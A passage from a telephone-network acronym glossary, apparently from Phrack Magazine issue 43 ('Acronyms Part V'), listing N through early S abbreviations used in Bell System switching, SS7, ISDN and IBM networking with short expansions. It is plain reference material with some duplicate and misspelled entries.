NDS/FORMS Mechanized forms - System 36 NDS/MT Mechanized tool interface - System 36 NDS/PDB Personnel database - System 36 NDU Network data unit NE Near end NE Network element NE Network elements NEAS Non-optional extended area service NEBE Near end block error (IOM2 monitor message) NEBS Network equipment-building system NEBS Network equlpment-building system NEBS New equipment-building system NECA National exchange carrier association NECC National emergency coordination center (bellcore) NEG Negative NEON Nonmanagement employee opportunity network NERC National emergency relocation center NESAC National electronic switching assistance center NESC National electric safety code NET (ec) european standards of telecommunication NETPARS Network performance analysis reporting system (IBM Vtam) NETPRT Netprt NETS Nationwide emergency telecommunications system NETTIMS Nettims NETWORK Sidethe segment of the time slot interchanger (TSI) that is NEXT Near end cross (x) talk NEXT Near end crosstalk NEXT Node exhaust tool system NFID Non-fielded id NFM Network force management NFS Network file system NFT Network file transfer NG No good NGF Number group frame NGF Number group frame for 5 Cross Bar NHLS Next higher level support NHR Non hierarchial routing NHR Not hard to reach NI Network interface NI/NC Network interface/network channel NID Network in dialing NID Network information database NIP Nucleus initialization program NIPA Net income and productivity analysis NIRS National yellow pages services invoice receiving system NIS Operation system-intelligent network elements NIS(FLEXCOM) Network interface system - OPS/INE NKP No key pulse NKP No key pulse (MDII) NL-PG Line number page NLD Nonlinear distortion NLD-SN Nonlinear distortion signal/noise NLDM Network logical data manager (IBM VTAM option) NLP Network layer protocol NM Network maintenance NM Network management NM Network management. NM Network module NMA Network management applique NMA Network monitoring and analysis NMAT Nonmanagement attendance tracking system NMB Network management busy (NTI) NMC Network management center NMC Network mondule controller (NTI) NMDT Network management display terminal (AT&T) NMMPEN Network maintenance management planing NMOS Network management operations support NMPR Network management printer (AT&T) NMS Network management services NMS Network management system NN Two digit number NNN Three digit number NNNN Four digit number NNX Central office code designating the customer exchange NNX Network numbering exchange NNX Telephone exchange code NO Number NOC National operations center at Bedminister N.J. NOC Network operations center NOC Normalized office code NOCS Network operations center system NOD Network out dialing NODAL Network operations forum NOE Number of oes to be assigned NOL Nac service order listing NOMAD No-op instruction NOPS Network operations plan system NOR/TADS North region/testing and development system NORAD North american air defense command NORGEN Network operation report generating NORGEN Network operations report generator NORGEN Network operations report generator system NORM Normal NORM Return to normal (IOM2 monitor command/message) NOS Network operating system NOTIS Network operations trouble information system NOW Network optical warehouse NP Non-published NPA Area code and exchange number NPA Network peformance analyzer (IBM) NPA No power alarm NPA Numbering plan area (area code) NPAP Nonmangement performance appraisal plan NPC Network processor circuit NPC No parameter choices NPDA Network problem determination applicator (IBM) NPH Network protocol handler NPM Network performance monitoring system NPS Network planning system NPSI Ncp packet switching interface NPUMP Normal pump NPV Net present value NQ Telegraph customized-service code for LATA access NR No response. NRAS Nova/rider awards system NRC Non-recurring charge NRG Number of rings NRM Normal response mode (hscx) NRM Normalizing ccs value NRODD Non-redundant ODD NRRI National regulatory research institute data NRRT Non-reroutable traffic NRS Network routing system (MBT) NRT No response while in test mode. NRZ Non return to zero NRZC Nrz change NRZI Nrz inverted NRZM Nrz mark NSA National security agency NSAC Network service administration center NSACGCOMP NS SCP ACG component NSBADRESP NS SCP response message with invalid data NSC Network service center NSCMP Network service center multi (dddcservice bureau) NSCS Network service center system NSD No start dial NSD Number summary display NSDB/IA Network and service data base/interface administration NSE Network switching engineering NSE Noise NSEC Network switching engineering center NSEP National security emergency preparedness NSFNET National science foundation network NSN Network services node NSNONRTEMSG NS reject message NSP Network service part (SS7: SCCP+MTP) NSP Non sent paid (coin) NSPEC Node spec file NSPMP Network service performance measurement plan NSPMP Network switching performance measurement plan NSPRR Network switching performance results report NSQRYFAIL NS query fail NSS Network support system NSSD Network switched services district NSSNCOMP NS SCP response message with a send notification NSSNCOMP NS SCP response message with a send notification received at the switch NSTAC National security telecommunications advisory committee NSTNMSG NS termination notification message sent from the switch to the SCP NSTS Network services test system NSU Network support utilities NSs Network system (i.e. DACS; SDACSL CDACSL OSU; CSU... etc) NStA (Ger) PBX NT Network termination NT Northern telecom NT Protection alarm-metalic-service code for LATA access NT/S NT simulator SIPB7020 NT01 Network frame unable to switch off line after fault detection NT02 Network path trouble trunk to line - 1AESS network trouble NT03 Network path trouble line to line - 1AESS network trouble NT04 Network path trouble trunk to trunk - 1AESS network trouble NT06 Hourly report of network frames made busy - 1AESS network trouble NT1 NT serving layer 1 (NCTE) NT10 Network path failed to restore -1AESS network trouble NT2 NT serving layer 1 to 3 (subscriber interface of nt NTC National trunk congestion NTD Normal direction NTDACT Network termination (NT) is deactivated. NTE Network terminal equipment NTE Network terminating equipment NTEC Network technical equipment center NTEC Network terminal equipment center NTEC Networkbterminal equipment center NTI Northern telcom inc. NTIA National telecommunications and information agency NTM Nt test mode (IOM2 monitor message) NTN Number of tns to be assigned NTO Network terminal option (IBM) NTOFN NT off normal. NTP Northern telecom practice (NTI) NTPWR NT lost power. NTRAP Network trouble analysis plan NTS Network technical support NTS Network test system NTT No test trunk NTTMP Network trunk transmission measurement plan NTWRK Network NU Protection alarm-service code for LATA access NUA (international) network user address NUA Network user address NUA Network utilization analysis NUC Nailed-up connection NUI Network user identification NUL Null NUP National user part NV Protective relaying/telegraph grade-service code for LATA access NVM Non volatile memory (eeprom) NW Telegraph grade facility-75 baud-service code for LATA access NWB Network-busy (NTI) NWK Adminnetwork administration budgets system NWM Network management (NTI) NWPK Network packs NXX Refers to the central office designation of the telephone NY Telegraph grade facility- 150 baud-service code for LATA access NYNEX NYNEX corporation NYNEX New york NYPS National yellow pages services NYPSA National yellow pages services association O Priority. O+I Originating plus incoming calls to a switching module. O-LTM Optical line terminating multiplexer O/S Operating system OA Line equipment assignment option OA Out of alignment OA&M Operations OA&M Operations administration and maintance OAM Office data administration system OAP Operator services position system administrative processor OASIS Office automation strategy for information systems OASIS Overseas accounting settlement and information OASYS Office automation system OATQ OSPS ANSI TCAP query and reply OATS Operator assistance tracking system OBA Out of band announcement OBF Ordering and billing forum OBH Office busy hour OBS Observed data rate OC Office communication OC Operating company OC Operator centralization OC&C Other charges and credits OCAS OSPS customer account services OCAS7 OSPS customer account services CCSS7/international CC validation OCC Other common carrier OCC Other common carriers OCC Usage occupancy OCCH Outgoing connections per circuit per hour OCCS OSPS common channel signaling OCCS Order control and coordination system (BTL) OCE Other common carrier channel equipment OCN Operating company number OCOIN OSPS coin OCP Optional calling plan OCP Origination point code (SS7) OCPDG Ocp data gathering OCR Optical character reader (auerbach computer technology report) OCR Optical character recognition (IBM) OCRS Optical character recognition system OCS Offical communication services OCS Old class of service OCS/CTS Official communications services installation and OCS/CTS Official communications services installation and maintenance cos OCSDSELR OCS data station equipment location report OCSOLRM Official communications services (OCS) on-line reference OCTD OSPS centralized automatic message accounting tone decoder OCU Office channel unit ODA Office data administration ODA Office data assembler ODA Office document architecture ODAC Operations distribution administration center ODACCIN OSPS directory assistance (DA) call completion and intercept ODB On-demand B-channel counts. ODB Operations divestiture board ODCS Official data communications service ODD Office dependent data ODD Operator distance dialing ODDBU Office dependent data backup ODDD Operator direct distance dialing ODDS Order data distribution system ODIN Online data integrity system ODP Office dialing plan ODP Organization development program ODP Organizational design program ODS Overhead data stream ODS Tnds on-line demand servicing OE Office equipment OE Office equipment / office equipment number OE Office equpiment number OEC Other exchange carrier OEC Outside plant equivalence codes OEIC Optoelectronic integrated circiut OEIS OSPS external information system OEM Original equipment manufacture OEM Original equipment manufacturer OF Official (telco owned) OF Overflow OFA OSPS facility administration OFC Office OFF OSPS fast features OFF HK Off hook OFFN Off-normal OFL Overflow(s) OFNPS Outstate facility network planning system OFRD Offered (calls [peg count])(NTI) OFRT Office route (NTI) OFT Optical fiber tube OGO Outgoing only trunk OGT Outgoing trunk OI Off premises intercommunication station line INTER/TRA blocal 1-2 OI Optical interface OIJ Orders in jeopardy OINTA OSPS interflow listing services/C-ACD measures OIRCV OSPS interflow T&A calls received OISNT OSPS interflow T&A calls sent OKMDT Oklahoma management development training OKP Operational kernel process OKRA Operator keyed trouble report OLCP Optional local calling plan OLIDB OSPS line information data base OLIPD Online invoice payment data OLRM Online reference material OLS Originating line screening OLTEP Online test executive program OLTS Optical loss test set OM Operational measurement (NTI) OM Operational measurements OM Output mux OMAP Operations and maintanance application part OMAT Operations maintenance and administration team OMC Operating and maintainance center OMD Out messages - day OMDB Output message data base OMDB Output message database OMISC OSPS miscellaneous call OML Outgoing matching loss OMM Output message manual OMNI Online marketing networked information system OMP SS7 fe operation management protocol OMPF Operation and maintenance processor frame ON Off network access line INTER/TRA blocal 1-26 ON HK On hook ONA Open network architecture ONA Open network architecture (FCC computer inquiry iii) ONAC Operations network administration center in K.C. (AT&T) ONAL Off network access line ONALS Off-net access lines ONC On line COSMOS ONDDBOV OSPS NCD message received indicating database overload ONDDBUN OSPS NCD message returned data base unable to process ONDGMSG OSPS NCD message received garbled ONDIRPY OSPS NCD message received with an inconsistent reply ONDNBLK OSPS NCD message returned because of network blockage ONDNCON OSPS NCD message returned because of network congestion ONDNRTE OSPS NCD message returned because of no routing data ONDTOUT OSPS NCD message returned because of timeout ONDUNEQ OSPS NCD message returned ONDURPY OSPS NCD message received with an unexpected reply ONI Operator number identification ONP Open network provision ONPA Originating numbering plan area ONS On line switch ONSITE Urban decisions system ONTC Office network and timing complex ONTC Office network and timing complex (CM2 offices only) ONTCCOM Office network and timing common units OOB Out-of-band OOC Originating office code OOC Out-of-chain OOF Out-of-frame OP Off premises extension INTER/TRA blocal 1-26 OP Operation OP Outside plant OP ALL Option all OPC Originating point code OPC Originating point codes OPCDB Operations common database OPDU Operations protocol data unit (x.411: p3) OPEOS Outside plant planning OPH Operator handled OPM Outage performance monitoring OPM Outside plant module OPN Open-of-day report OPNOXL3 OSPS position no level 3 protocol. OPR Operator OPS Off-premises station OPS Outside plant study system OPSM Outside plant subscriber module OPT Optional OPU Outside plant cable usage OPX Off-premises extension OR Originating register OR & RG Operating rate and route guide ORB Office repeater bay ORBIT Osp rehabilitation budget information tracker ORC Originating rate center ORD Service or work order ORD Work order ORD# Order number ORDN Order number. ORDNO Service order number ORE Order edit ORE-G Order edit global ORI Order input ORIG Allows originating ORLF Originating register link frame ORLMF Originating register line memory frame ORM Optical remote module ORM Optical remote switching module ORM Optically remote switching module ORMC Originating register marker connector ORP Operational review plan ORR Overflow reroute ORRS Online records and reporting system (TNDS) ORS Order send ORTN Orientation ORTR OSPS real-time rating OS Off premises PBX station line INTER/TRA blocal 1-26 OS Operations systems (operations support systems) (OSS) OS Operator service OS Origination scanning OS Out of service OS Out sender OS Outstate OS/D Operator services/deaf OSAC Operator services assistance center OSAC Operator services of answer consistency OSAM Overflow sequential access method (IBM) OSAP Operations systems architecture plan OSC Operator services center OSC Oscillator OSCAS Operator service control access system OSDS Operating system for distributed switching OSDS-C Operating system for distributed switching in the conection OSDS-M Operating system for distributed in the switching module. OSE Oscillator error flip-flop OSI Open system interconnection OSI Open systems interconnection OSLF Out sender link frame OSM1 Optional services menu screen number 1 OSN Operations systems network OSO Originating screening office OSO Originating signaling office OSPE Outside plant engineer OSPI Operator services planning information OSPRE/CON Outside plant reconciliation OSPS Operator service position system OSPS Operator services position system OSPS Outside plant studies OSPS-DL OSPSystem data links OSR Ongoing support request OSS Operation support system OSS Operations support system OSS Operations support system (BTL) OSS Operator service signalling OSS Operator services system OSSGR Operator services system generic requirements OSSP Operations systems strategic plan OSSS Operator services support system OSTC Operations systems technical center OT Originating traffic OT Other type OT Overtime OTA OSPS toll and assistance OTC Operating telephone company (in bell system) OTDR Optical time domain reflectometers OTER Operator team efficiency ratio OTG Outgoing trunk group OTH Other OTO Office-to-office OTR Operational trouble report OTSS Off the shelf system OTTS Outgoing trunk transmission system OUC Orgination unit code OUT Outgoing trunk groups OUTWATS Outward wats OUTWATS Outward wide area telecommunications service OVF Overflow (NTI) OVLT Overvoltage protection OVLY Overlay scheduling OVOEQ OSPS call volume and equipment usage OVRLD Overload or congestion control OVRRNG Overrange OVS Overseas OVW Equipment class overwrite OW Over-write OWG Optical wave guide OWT Outwats [code 024(5500-5600)] OXPRESS Zero express P Commitment time for having this trouble repaired. P-tone Pseudo tone P/AR Peak-to-average ratio P/F Poll/final bit PA Power allarm PA Program address PA Program application PA Protective alarm (AC) INTER/TRA blocal 1-26 PABX Private automatic branch echange PABX Private automatic branch exchange PAC Percent access chargeable PACE Program for arrangement of cables and equipment PACK Peripheral equipment packs PACT Prefix access code translator PAD Packet assembler/dissasembler PADDLE Program for administering data bases in the lfacs PADS Planning analysis and decision support PADSX Partially automated digital signal cross-connect PAK Work packages PAL Pre-service action limit PAL Price analysis list PAL Pricing and loading (mcauto) PAL Purchasing authorization letter PAM Pass along method (SS7: in ISUP) PAM Primary access method PAM Pulse amplitude modulation PAN Panel PAN Personal account number PANDS Purchase & sales PANS Pretty advanced new stuff PAP Publications' accounts payable PAQS-10 Provisioning and quotation system PARMS Parameters PARTS Tvcom electronic parts inventory PAS Protocol architecture specification for IOS (PCT) PAS Public announcement service PAT Position attached signal time-out PAT Position attached signal time-out (MDII) PAT Power alarm test PATROL Old version of 'esscoer' PAX Private automatic exchange PAYRO1IC Payroll-information center PB Lajga PB Placement bureau PB Sdga PBC Peripheral board controller PBC Peripheral bus computer PBC Peripheral bus. computer PBC Processor bus controller PBD Pacific bell directory PBG Packet business group PBHC Peak busy hour calls PBM LTG = 0 ho/mo msg reg (no ANI) PBO Paperless business office PBOD Pac bell order dist. PBVS Pacific bell verification system PBX Private branch exchange PBXC Private branch exchange center PBXWL Private branch exchange wiring list PC Peg count PC Peripheral control (software) PC Power controller PC Primary center PC Process controller PC Switched digital-access line INTER/TRA blocal 1-26 PCA Philip crosby associates PCB Program communications block-IMS (IBM) PCC Peg count converters PCDA Program controlled data acquisition PCF-II Programming control facility-II (IBM) PCH Parallel channel PCI Panel call indicator PCID Primary circuit identification PCL Payroll change list PCL Pcm data clock PCM Program control module PCM Pulse code modulation PCN Personal communication network (UK) PCN Product change notices PCO Peg count and overflow PCO Plant control office PCP Primary control program PCR Preventive cyclic retransmission (SS7 in MTP) PCSN Public circuit switched network PCT IOS program coding tools (SDL oriented) PCTF Per-call test failure PCTF Per-call test failure. PCTV Program controlled transverters PD Peripheral decoder PDA Parameteredatanassembler PDA Partial dial abandon PDA Partial dial abandon (MDII) PDC Primary digital carrier PDF Power distribution frame PDI Power and data interface PDIT Prefix/feature digit interpreter PDM Power down mode PDN Public data network PDSP Peripheral data storage processor PDT Partial dial time-out PDT Partial dial time-out (MDII) PDU Protocol data unit (x.400) PE Peripheral equipment PE Program audio 200-3500 hz-service code for LATA access PECC Product engineering control center PEP Position establishment for parties PER For each.. or according to PER Protocol error record PF Printout follows PF Program audio 100-5000 hz-service code for LATA access PFM Pulse frequency modulation PFOFF Power feed off (C/I channel code) PFPU Processor frame power unit PFR Party line fill report PFR Polarity failure PFR Polarity failure (MDII) PFS Page format selection (teletex) PFS Pcm frame synchronisation signal PG Page PG Paging INTER/TRA blocal 1-26 PG Program document index PG Program frequency weighting PGTC Pair gain test controller PH Packet handler PH Parity high bit PH Pending header PH Protocol handler PH JTR Phase jitter PH- Physical- PHY Physical PIA Plug-in administrator PIC PCM interface controller PIC Plastic-insulated cable (plant) PIC Polyolefin insulated cables (plant) PIC Primary independent carrier (switching) PICB Peripheral interface control bus PICS Plug-in inventory control system PICS Plug-in inventory control system (PICS/DCPR) PICS/DCPR PICS/detailed continuing property records PID Personal ID PIDB Peripheral interface data bus PIINT Allow packet interface interrupt PIN Personal identification number PIOCS Physical i/o system PIP PCM interface port PIP Packet interface port PIU PCM interface unit PJ Program audio 50-8000 hz-service code for LATA access PK Program audio 50-15000 hz-service code for LATA access PKC Package category PKT Package type PL Parity low bit PL Private line PL Private line circuit number PL Private line-voice INTER/TRA blocal 1-26 PLAR Private line automatic ringdown PLC Physical link control (IOS) PLD Partial line down (teletex) PLGUP Plug-up (currently no affect). PLIC Pcm line interface PLL Phase locked loop PLU Partial line up (teletex) PM Peripheral module PM Peripheral modules PM Phase modulation PM Plant management PM Preventive maintenance PM Protective monitoring INTER/TRA blocal 1-26 PM01 Daily report - 1AESS plant measurments PM02 Monthly report - 1AESS plant measurments PM03 Response to a request for a specific section of report - 1AESS PM04 Daily summary of iC/Iec irregularities - 1AESS plant measurments PMAC Peripheral module access controller PMB LTG = 1 ho/mo regular ANI6 PMI Plant managementninstruction PMS Peripheral maintenance system pack PMS Peripheral maintenance system packs PMS Plant measurements system PMS HUB Picture phone meeting service hub PMU Precision measurement unit PN Pseudo noise (code) PNB Pacific northwest bell PNL Premis number list for TN PNP Private numbering plan (i.255 b) PNPN Positive-negative-positive-negative devices POB Periphal order buffer POF Programmable operator facility POP Point of presence PORT Remote access test ports POS Centralized automatic message accounting positions (NTI) POS Position POS TOPS (DMS) position (NTI) POSN-P Posn-p POSNOB OSPS position no B-channel. POSNRSP OSPS position no response. POT Point of termination POTS Plain old telephone service POVT Provisioning on-site verification testing PP Post pay PPC Pump peripheral controller PPD Peripheral pulse distributor PPG Precedence and preemption group PPM Periodic pulse metering. PPN Public packet switching PPS Product performance surveys PPS Public packet switching network PPS Pulse per second PPSN Public packet switched network PPSRV Pre-post service. PPU Power providing unit PP_D_M Point-to-point data maintenance PQ Program grade customized-service code for LATA access PR Cable pair id PR Pair normally tip and ring PR Protective relaying-voice grade INTER/TRA blocal 1-26 PRA Primary rate access PRCA Puerto rico communications authority PRE Previous PREMIS Premises information system PRFX Prefix PRFX Prefix translations PRI Frame priority PRI Primary rate interface PROC Processor PROG Program PROM Programmable read-only memory PROMATS Programmable magnetic tape system PROT Protection PROTEL Procedure oriented type enforcing language PROTO Protocol circuit PRP Periodic purging of remarks PRP Permanent cable pair remarks PRS Personal response system PRT Print PRTC Puerto rico telephone company PRZ Preferred rate zone PS Msc constructed spare facility INTER/TRA blocal 1-26 PS Packet switching PS Previously published/non-published facility indicator PS Program store PSAP Public safety answering point PSC Prime service contractor PSC Public safety calling system PSC Public service commission PSD Programmable scanner distribution PSDC Public switched digital capability PSDN Packed-switched data network (t.70) PSDS Public switched digital service PSE Packet switch exchange PSF Packet switching facility PSGRP Packet switching groups PSHF Peripheral equipment shelf PSIU Packet switch interface unit PSK Phase shift keying PSK Phase-shift keying PSL IOS protocol source library PSM Packet service module PSM Position switching module PSN Packet switched network PSN Public switched network PSO Pending service order PSODB Packet switching on-demand B-channel PSOFC Packet switching office (ISDN) PSPDN Packed-switched public data network PSPH Packet switching PH/DSLG (ISDN) PSPORT packet switching protocol handler (PH) port (ISDN) PSR Phase shift register PSS Packet switch stream PSS Packet switched services PSSM Packet switching per switching module (ISDN) PST Permanent signal time-out PST Permanent signal time-out (MDII) PST Pre-service testing PST Sides protocol software development PSTG Packet switching trunk group PSTLT Pre-service transmission action limit table PSTN Public switched telephone network PSTN Public switched telephone network (t.70) PSU Packet switch unit PSU Packet switch unit. PSU Program storage unit PSUPH Packet switch unit protocol handler PSW Program status word PSWD Password access PT Package time PT Point PT Program timer PTAT Private trans atlantic telecommunications PTCL Protocol PTD Plant test date PTR Printer PTT Postal telephone and telegraph PTW Primary translation word PTY Party indicator PTY Party number or position PU Power units PU Power up (C/I channel code) PUC Peripheral unit controller PUC Public utilities commission PULS Message-rate pulsing table (AMA NTI) PULS Pulse PULSG Pulsing PUM Pu mode PUMPHW Pump hardware errors PV Protective relaying-telegraph grade INTER/TRA blocal 1-26 PVC Permanent virtual circuit PVC Permanent virtual circuit (x.25 network) PVC Permanent virtual circuits PVN Private virtual network PVT Private PW Protective relaying-signal grade INTER/TRA blocal 1-26 PWC Premis wire center PX Pbx station line INTER/TRA blocal 1-26 PX Power cross. PZ Msc constructed circut INTER/TRA blocal 1-26 Q Report class. see table 5-1. Q-CIF Quarter cif (for ISDN low end video) QAM Quadrature-amplitude modulation QANN Announcements for queuing (MLHG) QAS Quasi-associated signaling QEX Question an execution QMLHG Queuing for multi-line hunt group QMP Quality measurement plan QPA Quality program analysis QRSS Quasi random signal source QS Packet synchronous access line INTER/TRA blocal 1-26 QSC Quad s interface circuit peb2084 QSF Queuing for simulated facility QSS Quality surveillance system QTAM Queued telecom access method QTG Queuing for trunk groups QU Packet asyncronous access line INTER/TRA blocal 1-26 QUE Queue R Initials and location of person reporting this trouble. R Review pending dispatch R Ring R&R Rate & route R&SE Research & systems engineering R-GRD Ring-to-ground R-T Ring-to-tip R/O Read/only R/W Read write R/WM Read/write memory R1 Regional signaling system 1 (based on CCITT SS5 (2600)) R2 Regional signaling system 2 (based on CCITT SS4 (2400)) RA Rate adaption RA Ready access RA Remote attendant INTER/TRA blocal 1-26 RACF Remote activated call forwarding RAD Receive adress RAF Recorded announcement facility RAF Recorded announcement function RAF Recorded announcement function (DSU2) RAL Relay assignment list RAM Random access memory RAM Random-access memory RAND Rural area network design RAO Regional accounting office RAO Revenue account office RAO Revenue accounting office RAP Recorded announcement port. RAP Relay assignment parameters RAP Rotary assignment priority RAR Return address register RAS Release sequence number lists and related TN/OE RAS Remote access services RASC Residence account service center RAT Rating RATDBOV RATE message received indicating data base overload RATDBUN RATE message returned because data base unable to process RATGMSG RATE message received garbled RATNBLK RATE message returned because of network blockage RATNCON RATE message returned because of network congestion RATNRTE RATE message returned because of no routing data RATTOUT RATE message returned because of timeout RATUNEQ RATE message returned because of unequipped destination RATURPY RATE message received with an unexpected reply RAU RSM alarm RBEF Read block error counter for far end (IOM2 monitor command) RBEN Read block error counter for near end (IOM2 monitor command) RBHC Regional bell holding company RBOC Regional bell operating company RBOC Regional boc RBOR Request basic output report RBS Print tbs relays assignment record RC Rate center (NTI) RC Recent change RC Regional center RC Resistance-capacitance RC/V Recent change and verify RC18 Rc message response - 1AESS RC RCC Radio common carrier RCC Remote cluster controller RCC Request corrupted CRC (in EOC) RCC Reverse command channel RCD Received RCE Ring Counter Error RCF Remote call forward RCF Remote call forwarding RCFA Remote call forwarding appearance (NTI) RCI Read controller interface (IOM2 monitor command) RCL Route clock RCLDN Retrieval of calling line directory number RCLK Remote clock RCM Remote carrier module RCMAC Recent change memory administration center RCMG Recent change message generator RCOSC Remote clock oscillator RCOXC Remote clock oscillator cross couple RCP Recent change packager RCP Remote copy RCR Recent change report RCRE Receive corrected reference equivalent RCREF Remote clock reference RCS Recent change summary RCSC Remote spooling communications subsystem RCT Remote concentrator terminal RCU Radio channel unit RCU Repeater control unit (i.e. ASIC between two IEC-q2s) RCV Receive RCVR Receiver RCW Recent change keyword RCXC Remote clock cross couple RDATE Release date (update database date) RDB/RDR Recent Disconnect bussiness/resid. RDBM Relational data base management RDES Remote data entry system RDFI RSM digital facilities interface RDG Message register reading RDS Radio digital system RDS Reference distribution system RDS Running digital sum RDSN Region digital switched network RDT Radio digital terminal RDT Remote digital terminal RDY Resynchonisation indication after loss of framing (C/I channel CO) RE Lajrr RE Radiated emission (EME) REACC Reaccess REC Record REC Recreate (display) REC Regional engineering center RED Recent change message text editor REH Recovered history REJ Reject (LAP-D command/response) REL Release (i.451) REL Release non-intercepted numbers by release date REM Remote equipment module REM Remove frame locations REMOBS Remote observation system REMSH Remote shell REN Ring equivalence number REOC Real estate operations center REP Reprint option REPT# Report number REQ Required RES Reset (C/I channel code) RES Resistance RES Resume (i.451) RES Send a solicited response RES1 Reset receiver (C/I channel code) RET Retermination of frame locations REV Reverse charging (i.256 c) REV Reversed REW Rework status REX Reexecute a service order REX Routine exercise. REX Routine exerciser. REXX Restructred extended executer language RF Radio frequency RFI Radio frequency interference RID Read identification (IOM2 monitor command) RID Remote isolation device RISLU Remote integrated services line unit RJ Reject RJDT Reject date RJR Remove jeopardy reason codes RJR Valid reject reasons RKW (ger pcm30) fas RL Repeat later RL Resistance lamp RL Retry later RL Return loss RLC Release complete msg. (SS7: in SCCP) RLCM Remote line concentrating module RLDT Release date RLF Re-using dips upper bound load factor RLG Release guard on unstable call (outgoing) RLI Remote link interface RLM Remote line module RLO Automatic relay assignment present RLOGIN Remote login RLS Release RLSD Released msg. (SS7: in SCCP) RLST Release status RLT Remote line test RLT Remote loop test RLY Miscellaneous relay RM Remark RMA Request for manual assistance RMAC Remote memory administration center RMAS Recent message automatic system RMAS Remote memory administration RMAS Remote memory administration system RMK Hunt group remarks RMK Remarks RMK Remarks on cable pair RMK Remarks on office equipment RMK Remarks on orders RMK Remarks on telephone number RMM Remote maintenance module RMP Recent change punctuation table RMPK Remote shelf RMR Remote message registers RMS Remote mean square RMS Root-mean-square RMS-D Remote measurment system-digital RMS-D1 Remote measurment system-digital signal level one RMS-D1A Remote measurment system-digital signal level one access RMS-M Remote measurment system-metallic (through SMAS) RMS-MS Remote measurment system-metallic small (through SMAS) RMV Remove RMV Removed from service - 1AESS remove RN Reference noise RN Ring node RNA Release telephone numbers for assignment RNG Ringing RNGS Rings RNMC Remote network management center RNO Rss subentity number RNOC Regional network operations center RNR Receive not ready (LAP-D command/response) RO Receive only RO Routine other. ROB Remote order buffer ROC Regional operating company RODD Redundant ODD ROE Reservation order establishment ROE Rss's office equipment ROH Receiver off hook ROI Reservation order inquiry ROK Republic of korea ROM Read-only memory ROOT System manager for some unix os and COSMOS ROP Receive-only printer ROSE Remote operation service element (TCAP subset) ROTF Operational trouble. ROTL Remote office test line ROTLS Remote office testline system ROUT Routes ROW Reservation order withdrawal RP Repeater RPFC Read power feed current value (IOM2 monitor command) RPM Recent change parameters RPO Regional procurement organization RPOA Recognized private operating agency RPT Repeated RPT Report RQ Rpntr RQS Rate/quote system RQSM Regional quality service management RQST Request RR Receive ready (LAP-D command/response) RRCLK Remote clock circuit pack RRO Reports receiving office RS Radiated susceptibiltiy (EMS) RS Record separator (ascii control) RS Repair service RS Reset RSA Repair service attendant RSAT Reliability and system architecture testing RSB Repair service bureau RSB Repair servicenbureauem RSC Remote switching center RSC Reset confirm (SS7: in SCCP and ISUP) RSC Residence service center RSCS Remote source control system RSE Remote service equipment RSHF Remote concentration line shelf RSIT Remote site RSLC Remote subscriber line module controller RSLE Remote subscriber line equipment RSLM Remote subscriber line module RSM Remote switching module RSS Remote switching system RST Reset received (outgoing) RST Resistance test RST Resistance test (SARTS command) RST Restore RST Restored to service status - 1AESS restore RSTS/E Resource system time sharing/enhanced RSU Remote switching unit RSY Resynchronizing (C/I channel code) RSYD Rsy downstream RSYU Rsy upstream RT Radio landline INTER/TRA blocal 1-26 RT Remote terminal RT Remote terminal (opposite to cot) RT04 Status of monitors - ringing and tone plant-1AESS RTA Remote trunk arrangement RTA Remote trunking arrangement RTAC Regonal Technical Assitance Center RTAC Remote a trunk assembler center RTB Retransmission buffer RTCA Radio technical commission of aeronautics RTEST Tops remote test RTF Release timeout failure RTH Report transaction to count spare and diped line equipment RTI Route index RTIME Release time (update database time) RTL Resistor-transistor logic RTM Regional telecommunications management RTM Remote test module RTN Return to normal (in EOC) RTOC Resident telephone order center RTP Rate treatment package RTP Remote test point (RTS-5A) RTPP Remote test port panel RTR Route TReatment (GTE) RTRV Retrieve RTS Relay and telephone number status report RTS Remote test unit RTS Remote testing system RTS Request to send RTS SMAS remote test system located in central offices RTSE Reliable transfer service element RTSI Receive time slot interchanger RTU Remote trunking unit RTU Right to use RTZ Rate zone RU Receive unit RUM Remote user multiplex RUP Request unsolicited processing RV Review RVDT Review date and time RVPT Revertive pulsing transceiver RVPT Revertive pulsing transceivers RW Read/write permission RWC Remote work center RX Remote exchange RZ Resistance zone RZ Return to zero RxSD Receive serial data ==Phrack Magazine== Volume Four, Issue Forty-Three, File 25 of 27 {Acronyms Part V} S Date and time report received. S Seconds S Send toscreener S Sleeve S Start dial signal S&E Service & equipment S- Supervisory (S-frames) S-N Signal-to-noise ratio S/R Send/receive key S1DN Stage one distribution network S96 SLC 96 SA Sattelite trunk INTER/TRA blocal 1-26 SA01 Call store memory audit results - 1AESS software SAA System applications architecture (for ps/2) SABME Set asynchronous balanced mode (ABM) extended (LAP-D command) SAC Service access connector (-> sipb) SAC Service area computer SAC Special area code SAC Switch activation SAD System access delay SAG Street address guide SAI S activity indicator (in EOC) SAI Serving area interface SAI Summary of action items SALI Standalone automatic location identification SAM Subsequent address msg. (SS7: in ISUP) SAMA Step by step automatic message accounting SAMEM Stand-alone billing memory SANE Signaling area/network code (SS7) SAP Service access point SAPI Service access point identifier SAR Store address register SARTS Switch access tremote test system SARTS Switched access remote test system SAS Switched access service SASWF Save all seems well failure flip flop SAT Special access termination SAT Supervisory audio tone SAT System access terminal SAW Surface acoustic wafe (filter) SB Switched access-standard-service code for LATA access SBC S bus interface circuit SBCX SBC extended SBI Synchronous backplane interconnect SBLN Standby line SBMS Southwestern bell mobile service SBS Skyline business systems SBUC S bus connector SC Scanner controller SC Sectional center SC System controller SC/SD Scan and signal distributor SCA Service order completion-automatic SCANS Software change administration and notification system SCAT Stromberg-carlson assistance team SCC Specialized common carrier SCC Station cluster controller SCC Switching control center SCC Switching control center. SCCP Signaling ccp (SS7: q.71x) SCCP Signaling connection control part SCCS Specialized common carrier service SCCS Switching control center system SCF Selective call forwarding SCF Simple completion for mdf SCH Test scheduale (command) SCHED Scheduled SCI Spare cable pair inquiry SCL Station clock SCLK Slave clock SCM Scramble coder multiplexer SCM Standard completion by mdf SCM Subscriber carrier module SCM Subscriber carrier module (DMS-1 digital pair gain system NTI) SCO Serving central office SCOT Stepper central office tester SCOTS Surveillance & control of transmissions system SCP Service control point SCP Service order completion by LAC SCP Signal control point SCP Signal conversion point SCP System control program SCPC Signal channel per carrier SCPD Supplementary central pulse distributor SCR Selective call rejection SCR Signaling configuration register SCR Standard completion by rcmac SCRC Send corrected reference equivalent SCRN Screening translations SCS SCM-10S Shelf (SLC-96) SCS SCM-10S shelf (SLC-96) SCSDH Scanner and signal distributor handler SCU Selector control unit SCX Specialized communications exchange SD Slip detected SD Switched access-improved-service code for LATA access SD&D Specific development & design SDACS Serving digital accessed and cross-connect system SDC Sales development center SDD Site 